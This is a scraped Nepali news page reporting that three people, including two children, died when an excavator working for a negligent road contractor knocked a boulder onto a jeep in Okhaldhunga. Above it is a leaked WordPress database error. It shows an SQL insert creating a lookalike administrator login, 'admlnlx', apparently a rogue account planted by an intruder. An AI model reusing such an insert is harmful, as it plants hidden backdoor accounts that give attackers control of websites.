WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTAUffZ9Yak3IzAr6OSkbMTc2F5avW1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:43:53', '', 'admlnlx', 'admlnlx')

तीनजनाको मृत्यु, ठेकेदारको लापरवाही कारण स्काभेटरले लडाएको ढुंगा जीपमाथि खस्यो – Gaule Khabar

तीनजनाको मृत्यु, ठेकेदारको लापरवाही कारण स्काभेटरले लडाएको ढुंगा जीपमाथि खस्यो

तीनजनाको मृत्यु, ठेकेदारको लापरवाही कारण स्काभेटरले लडाएको ढुंगा जीपमाथि खस्यो

काठमाण्डौ ।ओखलढुंगाको सिद्धिचरण नगरपालिका– ३ नारायणस्थानमा ठेकेदारको लापरवाही कारण तीन जनाले ज्यान गुमाएका छन् ।

ओखलढुंगाको मानेभन्ज्याङ गाउँपालिका– १ मोलीदेखि ओखलढुंगा सदरमुकामतर्फ आइरहेको को १ ज ३५६९ नम्बरको यात्रु सवार बोलेरो जिप बाटोमा माथीबाट ढुंगा खसेर लागेको हो ।

ओखलढुंगा निशंखे सडक ग्राभेलको ठेक्का पाएको कान्छाराम कन्सट्रक्सनले स्काभेटर लगाएर बाटोमाथि बाटा ढुंगा झिक्ने काम गरिरहेको थिए । त्यही ढुंगा खसेर मोलीबाट ओखढुंगा आउँदै गरेको जिपमा लागेको हो ।

ठेकेदारको असावधानीका कारण दुर्घटना भएको देखिएको प्रमुख जिल्ला अधिकारी दिलकुमार तामाङ बताए ।

जिपमा ६ जना सवार थिए । सिद्धिचरण नगरपालिका– १ तलुवाका १० वर्षीय युसव कोइराला, ७ वर्षीया युनिशा कोइराला र मानेभन्ज्याङ गाउँपालिका(१ मोलीका ३० वर्षीय हेम मगरको मृत्यु भएको प्रहरीले जनाएको छ । दुर्घटनामा तीनजना घाइते छन् । घाइतेमध्ये दुईको अवस्था गम्भीर रहेको र उनीहरूलाई हेलिकोप्टरमार्फत काठमाडौं ल्याउने तयारी भएको प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका